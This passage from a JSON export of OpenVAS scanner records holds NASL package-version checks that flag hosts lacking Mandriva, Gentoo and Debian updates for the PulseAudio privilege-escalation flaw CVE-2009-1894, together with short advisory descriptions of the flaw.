NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:20", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064503", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064503", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_171.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:171 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:171\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64503\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:32", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-13.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-13 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064435", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064435", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in PulseAudio may allow a local user to execute code with\nescalated privileges.\";\ntag_solution = \"All PulseAudio users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200907-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=276986\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200907-13.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64435\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200907-13 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/pulseaudio\", unaffected: make_list(\"ge 0.9.9-r54\"), vulnerable: make_list(\"lt 0.9.9-r54\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:35", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1838-1 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064476", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064476", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1838_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1838-1 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201838-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64476\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1838-1 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:35", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064394", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064394", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_152.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:152 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:152\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64394\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", 